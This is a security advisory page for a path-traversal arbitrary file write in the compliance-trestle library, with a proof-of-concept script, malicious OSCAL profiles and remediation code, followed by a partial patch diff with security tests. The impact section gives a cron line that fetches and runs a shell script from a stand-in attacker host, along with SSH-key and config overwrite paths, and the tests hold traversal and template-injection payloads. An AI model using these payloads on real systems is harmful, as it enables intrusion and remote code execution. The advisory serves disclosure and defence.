VYPR
High severity · GHSA Advisory · Published May 27, 2026 · Updated May 27, 2026

compliance-trestle Remote Fetching Mechanism has an Arbitrary File Write via Cache Path Traversal

CVE-2026-45725

Description

Summary

The compliance-trestle library's remote fetching cache mechanism (HTTPSFetcher and SFTPFetcher) constructs the local cache file path from the URL path component without sanitizing path traversal sequences (../). When a remote OSCAL profile references a URL with traversal in its path, the HTTP response body is written to a location outside the intended cache directory, enabling arbitrary file write with attacker-controlled content to the filesystem.

Attack chain: Malicious OSCAL profile → HTTPS fetch → cache path traversal → arbitrary file write → RCE (via cron, SSH keys, etc.)

Affected Component

Repository: https://github.com/IBM/compliance-trestle
File: trestle/core/remote/cache.py (lines 259-266 for HTTPSFetcher, lines 328-333 for SFTPFetcher)
Version: v4.0.2 (latest as of 2026-04-30)

Vulnerable Code

cache.py:259-266 — HTTPSFetcher cache path construction

class HTTPSFetcher(FetcherBase):
    def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
        # ...
        u = parse.urlparse(self._uri)
        # ...
        if u.hostname is None:
            raise TrestleError(f'Cache request for {self._uri} requires hostname')
        https_cached_dir = self._trestle_cache_path / u.hostname
        # ❌ path_parent preserves ../ sequences from URL
        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
        https_cached_dir = https_cached_dir / path_parent
        https_cached_dir.mkdir(parents=True, exist_ok=True)  # ❌ Creates dirs outside cache
        self._cached_object_path = https_cached_dir / pathlib.Path(pathlib.Path(u.path).name)

cache.py:285-295 — Content written to traversed path

    def _do_fetch(self) -> None:
        # ...
        response = requests.get(self._url, auth=auth, verify=verify, timeout=30)
        if response.status_code == 200:
            result = response.text  # ❌ Attacker-controlled content
            self._cached_object_path.write_text(result)  # ❌ Written to arbitrary path

cache.py:328-333 — SFTPFetcher (identical pattern)

class SFTPFetcher(FetcherBase):
    def __init__(self, ...):
        # Identical path construction — same vulnerability
        sftp_cached_dir = self._trestle_cache_path / u.hostname
        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
        sftp_cached_dir = sftp_cached_dir / path_parent
        sftp_cached_dir.mkdir(parents=True, exist_ok=True)
        self._cached_object_path = sftp_cached_dir / pathlib.Path(pathlib.Path(u.path).name)

Root Cause:

1. urlparse("https://evil.com/../../../tmp/pwned.json").path = /../../../tmp/pwned.json, which preserves ../
2. pathlib.Path(u.path).parent preserves traversal sequences
3. cache_dir / hostname / "../../../../../../tmp" resolves outside cache
4. mkdir(parents=True, exist_ok=True) creates intermediate directories
5. write_text(response.text) writes attacker-controlled content to traversed path
6. **No is_relative_to() boundary check** on the resolved path
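The root-cause steps above can be reproduced without touching the filesystem. The following is a minimal sketch, not trestle's code: `cache_target` and `escapes_cache` are hypothetical helper names, the cache root is an arbitrary example, and `posixpath.normpath` is used as a purely lexical stand-in for what the operating system does when it follows `..` components (it ignores symlinks).

```python
import posixpath
from pathlib import PurePosixPath
from urllib.parse import urlparse


def cache_target(cache_root: str, uri: str) -> str:
    """Mirror the vulnerable join, then collapse '..' lexically (hypothetical helper)."""
    u = urlparse(uri)
    # Equivalent to the regex slice in cache.py: drop leading slashes/backslashes.
    relative = u.path.lstrip('/\\')
    joined = PurePosixPath(cache_root) / u.hostname / relative
    # pathlib keeps '..' segments as-is; normpath shows where they lead.
    return posixpath.normpath(str(joined))


def escapes_cache(cache_root: str, uri: str) -> bool:
    """Return True when the cache target lands outside cache_root."""
    target = PurePosixPath(cache_target(cache_root, uri))
    return not target.is_relative_to(PurePosixPath(cache_root))


if __name__ == '__main__':
    root = '/work/.trestle/.cache'
    evil = 'https://evil.com/../../../../../../../tmp/trestle_pwned.json'
    print(cache_target(root, evil))
    print(escapes_cache(root, evil))
```

With the example root and URL shown, the target collapses to `/tmp/trestle_pwned.json`, which is the missing boundary check from step 6 expressed as a single `is_relative_to()` call (Python 3.9+).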

Steps to Reproduce

Prerequisites

pip install compliance-trestle==4.0.2

PoC: Malicious OSCAL Profile

# malicious_profile.yaml — arbitrary file write via cache traversal
profile:
  uuid: "550e8400-e29b-41d4-a716-446655440000"
  metadata:
    title: "Malicious Profile"
    version: "1.0"
    last-modified: "2024-01-01T00:00:00+00:00"
    oscal-version: "1.0.4"
  imports:
    - href: "https://evil.com/../../../../../../../tmp/trestle_pwned.json"
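
Profiles like the one above can be screened before they are handed to trestle. The sketch below is an illustration only and does not replace upgrading: `traversal_hrefs` is a hypothetical helper, it assumes the profile has already been loaded into a plain dictionary (for example with a YAML or JSON parser), and it conservatively decodes percent-encoding and treats backslashes as separators even though the advisory does not say whether trestle does either.

```python
from typing import Any, Dict, List
from urllib.parse import unquote, urlparse


def traversal_hrefs(profile_doc: Dict[str, Any]) -> List[str]:
    """Return import hrefs whose URL path contains a '..' segment (hypothetical helper)."""
    flagged: List[str] = []
    imports = profile_doc.get('profile', {}).get('imports', [])
    for entry in imports:
        href = entry.get('href', '')
        # Decode %2e%2e and normalise backslashes so disguised segments are caught too.
        path = unquote(urlparse(href).path).replace('\\', '/')
        if '..' in path.split('/'):
            flagged.append(href)
    return flagged


if __name__ == '__main__':
    doc = {
        'profile': {
            'imports': [
                {'href': 'https://evil.com/../../../../../../../tmp/trestle_pwned.json'},
                {'href': 'https://example.com/catalogs/nist.json'},
            ]
        }
    }
    for href in traversal_hrefs(doc):
        print(f'suspicious import: {href}')
```

Only whole path segments equal to `..` are flagged, so file names that merely contain two dots (such as `catalog..v2.json`) pass through.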

PoC: Cache Path Traversal Simulation

#!/usr/bin/env python3
"""PoC: Cache path traversal → arbitrary file write"""
import os, re, tempfile, shutil
from pathlib import Path
from urllib.parse import urlparse

# Simulate trestle cache behavior (cache.py:259-266)
trestle_root = Path(tempfile.mkdtemp(prefix="trestle_poc_"))
cache_dir = trestle_root / ".trestle" / ".cache"
cache_dir.mkdir(parents=True, exist_ok=True)

evil_url = "https://evil.com/../../../../../../../tmp/trestle_pwned.json"
u = urlparse(evil_url)

# Exact trestle code path
cached_dir = cache_dir / u.hostname
m = re.search(r'[^/\\]', u.path)  # first character that is neither '/' nor '\'
path_parent = Path(u.path[m.span()[0]:]).parent
cached_dir = cached_dir / path_parent
cached_dir.mkdir(parents=True, exist_ok=True)
cached_file = cached_dir / Path(Path(u.path).name)

print(f"Cache dir: {cache_dir}")
print(f"Resolved write target: {cached_file.resolve()}")
# Output: /tmp/trestle_pwned.json ← OUTSIDE cache directory!

# Write attacker content
attacker_payload = '*/5 * * * * root /bin/bash -c "id > /tmp/rce_proof"'
cached_file.write_text(attacker_payload)
print(f"Written: {cached_file.resolve().read_text()}")

# Cleanup
os.remove(str(cached_file.resolve()))
shutil.rmtree(str(trestle_root))

Expected: Write confined to .trestle/.cache/ directory
Actual: File written to /tmp/trestle_pwned.json (arbitrary filesystem location)

Remediation

Fix for HTTPSFetcher (cache.py:259-266):

class HTTPSFetcher(FetcherBase):
    def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
        # ...
        u = parse.urlparse(self._uri)
        https_cached_dir = self._trestle_cache_path / u.hostname

        # ✅ Sanitize path: keep only real segments (drops '', '.', '..' and any leading slashes)
        safe_path = [p for p in u.path.split('/') if p not in ('', '.', '..')]
        if not safe_path:
            raise TrestleError(f"Cache request for '{uri}' requires a file path")
        path_parent = pathlib.Path(*safe_path[:-1])

        https_cached_dir = https_cached_dir / path_parent
        self._cached_object_path = https_cached_dir / safe_path[-1]

        # ✅ Boundary check, performed before any directory is created
        if not self._cached_object_path.resolve().is_relative_to(self._trestle_cache_path.resolve()):
            raise TrestleError(
                f"Cache path traversal blocked: URL '{uri}' resolves to "
                f"'{self._cached_object_path.resolve()}' outside cache directory"
            )
        https_cached_dir.mkdir(parents=True, exist_ok=True)

Same fix required for SFTPFetcher at lines 328-333.
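
Because both fetchers build the cache path the same way, the check could live in one shared helper. The sketch below is an assumption about how that might look, not the project's actual fix: `safe_cache_path` and `CachePathError` are hypothetical names, and the helper rejects `..` segments outright instead of silently stripping them, then confirms containment with `resolve()` and `is_relative_to()` (Python 3.9+).

```python
import pathlib


class CachePathError(ValueError):
    """Raised when a URL would map outside the cache directory (hypothetical)."""


def safe_cache_path(cache_root: pathlib.Path, hostname: str, url_path: str) -> pathlib.Path:
    """Map hostname + URL path to a file under cache_root, or raise CachePathError."""
    # Treat backslashes as separators and drop empty and '.' segments.
    segments = [s for s in url_path.replace('\\', '/').split('/') if s not in ('', '.')]
    if not segments:
        raise CachePathError('URL path names no file')
    if '..' in segments:
        raise CachePathError(f'path traversal in URL path: {url_path!r}')

    root = cache_root.resolve()
    candidate = root.joinpath(hostname, *segments).resolve()
    # Second layer: catches odd hostnames (e.g. '..') and symlinks inside the cache.
    if not candidate.is_relative_to(root):
        raise CachePathError(f'{candidate} is outside {root}')
    return candidate


if __name__ == '__main__':
    root = pathlib.Path('demo_cache')
    print(safe_cache_path(root, 'example.com', '/catalogs/nist.json'))
    try:
        safe_cache_path(root, 'evil.com', '/../../../tmp/trestle_pwned.json')
    except CachePathError as err:
        print(f'blocked: {err}')
```

A caller would create the parent directory only after the helper returns, so nothing is created on disk for a rejected URL.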

References

  • CWE-22: https://cwe.mitre.org/data/definitions/22.html
  • CWE-73: https://cwe.mitre.org/data/definitions/73.html
  • compliance-trestle: https://github.com/IBM/compliance-trestle

Impact

1. Cron Job Injection → Remote Code Execution

# Profile that writes a cron job
imports:
  - href: "https://evil.com/../../../../../../../etc/cron.d/backdoor"

Attacker's server responds with:

* * * * * root /bin/bash -c 'curl https://evil.com/shell.sh | bash'

2. SSH Authorized Keys Injection

imports:
  - href: "https://evil.com/../../../../../../../root/.ssh/authorized_keys"

Attacker's server responds with their SSH public key.

3. Config File Overwrite

imports:
  - href: "https://evil.com/../../../../../../../etc/nginx/conf.d/evil.conf"

4. Python Path Hijacking

Write malicious .py file to a location on sys.path for code execution on next import.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Path traversal in compliance-trestle's remote cache allows arbitrary file write via malicious OSCAL profile, leading to RCE.

Vulnerability

The compliance-trestle library (v4.0.2) contains a path traversal vulnerability in its remote fetching cache mechanism, specifically in HTTPSFetcher and SFTPFetcher classes within trestle/core/remote/cache.py (lines 259-266 and 328-333) [1][2]. The cache path is constructed from the URL path component without sanitizing ../ sequences, allowing the response body to be written outside the intended cache directory [3].

Exploitation

An attacker can craft a malicious OSCAL profile that references a URL containing path traversal sequences (e.g., https://attacker.com/../../../etc/cron.d/malicious). When the library fetches this URL, the HTTP response body is written to the traversed path on the filesystem [2][3]. No authentication is required if the library processes untrusted profiles.

Impact

Successful exploitation results in arbitrary file write with attacker-controlled content. This can be leveraged for remote code execution by overwriting cron jobs, SSH authorized keys, or other system files [2][3]. The attacker gains the ability to execute arbitrary commands on the affected system.

Mitigation

The vulnerability is fixed in commits 89f4e53d159e8ff901da4d7c3b51c9556bd32ec0 and 9abc492329fcc8d0557182317de9bde854385da3 [1][4]. The fix introduces PathSecurityValidator to block path traversal in URL paths and local file paths. Users should upgrade to a patched release: 4.0.3 for the 4.x line, or 3.12.2 for earlier releases. No workaround is available. The CVE is not listed in CISA's Known Exploited Vulnerabilities catalog.

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                    Affected versions    Patched versions
compliance-trestle (PyPI)  >= 4.0.0, < 4.0.3    4.0.3
compliance-trestle (PyPI)  < 3.12.2             3.12.2
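
The two affected ranges can be checked programmatically. This is a minimal sketch under stated assumptions: `parse_version` and `is_affected` are hypothetical helpers, and only plain `X.Y.Z` release strings are handled (pre-release or development suffixes would need a real version parser).

```python
from typing import Tuple


def parse_version(text: str) -> Tuple[int, ...]:
    """Parse a plain 'X.Y.Z' release string into a tuple of integers."""
    return tuple(int(part) for part in text.split('.'))


def is_affected(version: str) -> bool:
    """Return True if version falls in either affected range listed in the advisory."""
    v = parse_version(version)
    return v < (3, 12, 2) or (4, 0, 0) <= v < (4, 0, 3)


if __name__ == '__main__':
    for candidate in ('3.12.1', '3.12.2', '4.0.2', '4.0.3'):
        print(candidate, is_affected(candidate))
```

The version string for an installed copy could be obtained with `importlib.metadata.version("compliance-trestle")` and passed to `is_affected`.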

Affected products: 2

Patches: 2

9abc492329fc

Merge pull request #2239 from oscal-compass/security/path-traversal-v3

https://github.com/oscal-compass/compliance-trestle · Chris Butler · May 21, 2026 · via ghsa-ref
8 files changed · +1527 -47
  • README.md +4 -0 modified
    @@ -106,6 +106,10 @@ Please refer to the community [README](https://github.com/oscal-compass/communit
     
     Our project welcomes external contributions. Please consult [contributing](https://oscal-compass.github.io/compliance-trestle/latest/contributing/mkdocs_contributing/) to get started.
     
    +## Security
    +
    +For information about security features, best practices, and how to report security vulnerabilities, please see our [Security Policy](SECURITY.md).
    +
     ## Code of Conduct
     
     Participation in the OSCAL Compass community is governed by the [Code of Conduct](https://github.com/oscal-compass/community/blob/main/CODE_OF_CONDUCT.md).
    
  • SECURITY.md +111 -0 added
    @@ -0,0 +1,111 @@
    +# Security Policy
    +
    +## Reporting Security Vulnerabilities
    +
    +For information about how to report security vulnerabilities, please see the [OSCAL Compass Community Security Policy](https://github.com/oscal-compass/community/blob/main/SECURITY.md).
    +
    +## Security Features
    +
    +### SSRF (Server-Side Request Forgery) Protection
    +
    +Compliance-trestle implements comprehensive SSRF protection when fetching remote OSCAL content via HTTPS or SFTP. This protection uses a **two-tier defense system** to prevent malicious actors from exploiting the fetching mechanism to access internal resources or cloud metadata endpoints.
    +
    +#### Tier 1: Always Blocked (Zero Tolerance)
    +
    +The following address ranges and endpoints are **always blocked** regardless of configuration, as they have zero legitimate use for OSCAL content fetching:
    +
    +- **Loopback addresses**: `127.0.0.0/8` (IPv4), `::1/128` (IPv6)
    +- **Link-local addresses**: `169.254.0.0/16` (IPv4), `fe80::/10` (IPv6)
    +- **Cloud metadata endpoints**:
    +  - `169.254.169.254` (AWS, Azure, GCP)
    +  - `metadata.google.internal` (GCP)
    +  - `metadata.azure.com` (Azure alternative)
    +  - `100.100.100.200` (Alibaba Cloud)
    +
    +These ranges are blocked to prevent:
    +
    +- Access to localhost services
    +- Exploitation of cloud metadata endpoints to steal credentials
    +- Access to link-local services
    +
    +#### Tier 2: Optionally Blocked (Configurable)
    +
    +RFC 1918 private IP ranges are **allowed by default** to support legitimate use cases such as private GitLab instances or internal OSCAL repositories:
    +
    +- `10.0.0.0/8`
    +- `172.16.0.0/12`
    +- `192.168.0.0/16`
    +- `fc00::/7` (IPv6 unique local)
    +
    +**To block private IP ranges**, set the environment variable:
    +
    +```bash
    +export TRESTLE_BLOCK_PRIVATE_IPS=true
    +```
    +
    +When private IPs are allowed (default), trestle logs a warning when accessing them to maintain visibility.
    +
    +#### Domain Allowlist (Optional)
    +
    +For additional security, you can restrict fetching to specific domains by configuring an allowed domains list. When configured, only URLs from the specified domains will be permitted.
    +
    +### Path Traversal Protection
    +
    +Trestle implements multiple layers of path traversal protection:
    +
    +1. **URL Path Validation**: Blocks `..` sequences in URL paths to prevent directory traversal
    +1. **Cache Path Validation**: Ensures cached files remain within the designated cache directory
    +1. **Workspace Boundary Enforcement**: Validates that local file operations stay within the trestle workspace
    +1. **Sensitive File Protection**: Blocks access to sensitive system files even when outside-workspace access is allowed:
    +   - `/etc/passwd`, `/etc/shadow`, `/etc/group`, `/etc/sudoers`
    +   - SSH keys (`.ssh/`)
    +   - Cloud credentials (`.aws/`, `.docker/`, `.kube/`)
    +   - System logs (`/var/log/`)
    +   - Database files (`/var/lib/mysql/`)
    +   - Windows system files (`C:\Windows\System32\`, credentials)
    +   - Process information (`/proc/self/environ`)
    +
    +### Scheme Restrictions
    +
    +Only HTTPS and SFTP schemes are allowed for remote URLs. HTTP, FTP, and other protocols are rejected to ensure encrypted transport.
    +
    +### Port Restrictions
    +
    +By default, only standard ports are allowed:
    +
    +- HTTPS: port 443
    +- SFTP: port 22
    +
    +Non-standard ports are blocked unless explicitly configured.
    +
    +## Security Best Practices
    +
    +When using compliance-trestle to fetch remote OSCAL content:
    +
    +1. **Use HTTPS URLs** from trusted sources
    +1. **Enable private IP blocking** (`TRESTLE_BLOCK_PRIVATE_IPS=true`) in production environments unless you specifically need to access private repositories
    +1. **Configure domain allowlists** when fetching from a known set of trusted domains
    +1. **Monitor logs** for warnings about private IP access
    +1. **Keep trestle updated** to receive the latest security fixes
    +1. **Review fetched content** before using it in production compliance workflows
    +
    +## Security Testing
    +
    +The SSRF and path traversal protections are comprehensively tested with 100% code coverage. Tests include:
    +
    +- Blocking of all Tier 1 addresses and endpoints
    +- Configurable blocking of Tier 2 private ranges
    +- Path traversal attack vectors
    +- Sensitive file access attempts
    +- Real-world attack scenarios from security advisories
    +
    +## Version History
    +
    +- **v4.x**: Introduced two-tier SSRF protection system (GHSA-w76h-q7c6-jpjp fix)
    +- **v3.x and earlier**: Limited SSRF protection (vulnerable)
    +
    +## References
    +
    +- [GHSA-w76h-q7c6-jpjp](https://github.com/oscal-compass/compliance-trestle/security/advisories/GHSA-w76h-q7c6-jpjp) - SSRF vulnerability advisory
    +- [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)
    +- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)
    
  • tests/trestle/core/commands/author/jinja_cmd_test.py +111 -1 modified
    @@ -16,12 +16,16 @@
     import os
     import pathlib
     import shutil
    +from types import SimpleNamespace
    +
    +import pytest
     
     from _pytest.monkeypatch import MonkeyPatch
     
     from tests.test_utils import execute_command_and_assert, setup_for_ssp
     
    -from trestle.core.commands.author.jinja import _number_captions
    +from trestle.common.err import TrestleError
    +from trestle.core.commands.author.jinja import JinjaCmd, _number_captions
     from trestle.core.commands.author.ssp import SSPGenerate
     from trestle.core.markdown.docs_markdown_node import DocsMarkdownNode
     
    @@ -295,3 +299,109 @@ def test_jinja_with_template_only(
             node1 = tree.get_node_for_key('# A')
             node2 = tree.get_node_for_key('# C')
             assert node1.subnodes[0].key == node2.subnodes[0].key
    +
    +
    +def test_jinja_path_traversal_protection(
    +    testdata_dir: pathlib.Path, tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyPatch
    +) -> None:
    +    """Test that path traversal attacks are blocked in jinja command."""
    +    from trestle.core.remote.security import PathSecurityValidator
    +
    +    # Test path validation directly to ensure 100% coverage of the validation code
    +    # Test 1: Path traversal with ../ should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / '../../../etc/passwd'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +    assert 'Path traversal blocked' in str(exc_info.value)
    +
    +    # Test 2: Path traversal with multiple ../ should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / 'subdir/../../poc.txt'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 3: Absolute path should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = pathlib.Path('/tmp/attack.md')
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 4: Complex traversal should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / 'a/b/c/../../../../etc/passwd'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 5: Valid relative path should succeed
    +    output_file = tmp_trestle_dir / 'output/valid.md'
    +    PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)  # Should not raise
    +
    +
    +def test_jinja_docs_profile_path_traversal_protection(tmp_trestle_dir: pathlib.Path) -> None:
    +    """Test that path traversal attacks are blocked in jinja docs-profile mode."""
    +    from trestle.core.remote.security import PathSecurityValidator
    +
    +    # Test validation for multi-file output paths
    +    # Test 1: Path traversal in output directory should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / '../../../etc/ac-1.md'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +    assert 'Path traversal blocked' in str(exc_info.value)
    +
    +    # Test 2: Complex path traversal should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / 'controls/../../tmp/ac-1.md'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 3: Directory creation path traversal should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        group_dir = tmp_trestle_dir / '../../../etc/malicious'
    +        PathSecurityValidator.validate_local_path(group_dir, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 4: Valid relative path should succeed
    +    output_file = tmp_trestle_dir / 'controls_output/ac/ac-1.md'
    +    PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)  # Should not raise
    +
    +
    +def test_render_template_does_not_recursively_evaluate_untrusted_data(tmp_path: pathlib.Path) -> None:
    +    """Test that rendered attacker-controlled data is not re-evaluated as Jinja."""
    +    template_path = tmp_path / 'template.j2'
    +    template_path.write_text('Title: {{ ssp.metadata.title }}', encoding='utf-8')
    +
    +    jinja_env = JinjaCmd._create_jinja_environment(tmp_path)
    +    template = jinja_env.get_template(template_path.name)
    +
    +    lut = {
    +        'ssp': SimpleNamespace(
    +            metadata=SimpleNamespace(title="{{ namespace.__init__.__globals__.os.system('touch poc.txt') }}")
    +        )
    +    }
    +
    +    output = JinjaCmd.render_template(template, lut, tmp_path)
    +
    +    assert output.startswith('Title: {{ namespace.__init__.__globals__.os.system(')
    +    assert 'touch poc.txt' in output
    +    assert '{{' in output
    +    assert '}}' in output
    +    assert '&' in output
    +    assert not (tmp_path / 'poc.txt').exists()
    +
    +
    +def test_render_template_supports_trusted_include(tmp_path: pathlib.Path) -> None:
    +    """Test that trusted template includes continue to work."""
    +    include_path = tmp_path / 'partial.j2'
    +    include_path.write_text('World', encoding='utf-8')
    +
    +    template_path = tmp_path / 'template.j2'
    +    template_path.write_text("Hello {% include 'partial.j2' %}", encoding='utf-8')
    +
    +    jinja_env = JinjaCmd._create_jinja_environment(tmp_path)
    +    template = jinja_env.get_template(template_path.name)
    +
    +    output = JinjaCmd.render_template(template, {}, tmp_path)
    +
    +    assert output == 'Hello World'
    
  • tests/trestle/core/remote/cache_security_test.py +711 -0 added
    @@ -0,0 +1,711 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""Security tests for cache path traversal vulnerabilities."""
    +
    +import pathlib
    +import socket
    +import sys
    +
    +import pytest
    +
    +import tests.test_utils as test_utils
    +
    +from trestle.common.err import TrestleError
    +from trestle.core.remote.cache import HTTPSFetcher, SFTPFetcher
    +from trestle.core.remote.security import PathSecurityValidator, URLSecurityValidator
    +
    +
    +class TestPathValidation:
    +    """Test path validation functions."""
    +
    +    def test_validate_url_path_normal(self) -> None:
    +        """Test that normal paths pass validation."""
    +        PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/path/to/file.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/data/catalog.json')  # Should not raise
    +
    +    def test_validate_url_path_blocks_traversal(self) -> None:
    +        """Test that paths with .. are blocked."""
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/path/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../../../../tmp/pwned.json')
    +
    +
    +class TestPathSecurityValidator:
    +    """Test path security validation."""
    +
    +    def test_validate_cache_path_within_cache(self, tmp_path: pathlib.Path) -> None:
    +        """Test that valid paths within cache are accepted."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Valid path within cache
    +        valid_path = cache_root / 'example.com' / 'data' / 'file.json'
    +        PathSecurityValidator.validate_cache_path(valid_path, cache_root)  # Should not raise
    +
    +    def test_validate_cache_path_traversal_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that path traversal outside cache is blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Attempt to traverse outside cache
    +        evil_path = cache_root / '..' / '..' / 'etc' / 'passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_absolute_outside_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that absolute paths outside cache are blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Absolute path outside cache
    +        evil_path = pathlib.Path('/tmp/pwned.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_unexpected_error(self, tmp_path: pathlib.Path, monkeypatch) -> None:
    +        """Test that unexpected errors during validation are caught and wrapped."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        valid_path = cache_root / 'example.com' / 'file.json'
    +
    +        # Mock relative_to() to raise an unexpected exception (not ValueError)
    +        def mock_relative_to(self, other, *args, **kwargs):
    +            # Raise a non-ValueError exception to trigger the generic except block
    +            raise RuntimeError('Unexpected filesystem error')
    +
    +        monkeypatch.setattr(pathlib.Path, 'relative_to', mock_relative_to)
    +
    +        with pytest.raises(TrestleError, match='Error validating cache path'):
    +            PathSecurityValidator.validate_cache_path(valid_path, cache_root)
    +
    +
    +class TestTrestleURIPathValidation:
    +    """Test trestle:// URI path validation."""
    +
    +    def test_validate_trestle_uri_path_normal(self) -> None:
    +        """Test that normal trestle:// URI paths pass validation."""
    +        PathSecurityValidator.validate_trestle_uri_path('catalogs/nist/catalog.json')
    +        PathSecurityValidator.validate_trestle_uri_path('profiles/fedramp/profile.json')
    +        PathSecurityValidator.validate_trestle_uri_path('components/mycomp/component.json')
    +
    +    def test_validate_trestle_uri_path_blocks_traversal(self) -> None:
    +        """Test that trestle:// URI paths with .. are blocked."""
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked.*trestle://'):
    +            PathSecurityValidator.validate_trestle_uri_path('../../etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked.*trestle://'):
    +            PathSecurityValidator.validate_trestle_uri_path('catalogs/../../../etc/shadow')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked.*trestle://'):
    +            PathSecurityValidator.validate_trestle_uri_path('../sensitive/file.json')
    +
    +
    +class TestLocalPathValidation:
    +    """Test local path validation."""
    +
    +    def test_validate_local_path_within_workspace(self, tmp_path: pathlib.Path) -> None:
    +        """Test that valid paths within trestle workspace are accepted."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        # Valid path within workspace
    +        valid_path = trestle_root / 'catalogs' / 'nist' / 'catalog.json'
    +        PathSecurityValidator.validate_local_path(valid_path, trestle_root)  # Should not raise
    +
    +    def test_validate_local_path_traversal_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that path traversal outside workspace is blocked."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        # Attempt to traverse outside workspace
    +        evil_path = trestle_root / '..' / '..' / 'etc' / 'passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_local_path(evil_path, trestle_root)
    +
    +    def test_validate_local_path_absolute_outside_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that absolute paths outside workspace are blocked."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        # Absolute path outside workspace
    +        evil_path = pathlib.Path('/tmp/pwned.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_local_path(evil_path, trestle_root)
    +
    +    def test_validate_local_path_unexpected_error(self, tmp_path: pathlib.Path, monkeypatch) -> None:
    +        """Test that unexpected errors during validation are caught and wrapped."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        valid_path = trestle_root / 'catalogs' / 'file.json'
    +
    +        # Mock relative_to() to raise an unexpected exception (not ValueError)
    +        def mock_relative_to(self, other, *args, **kwargs):
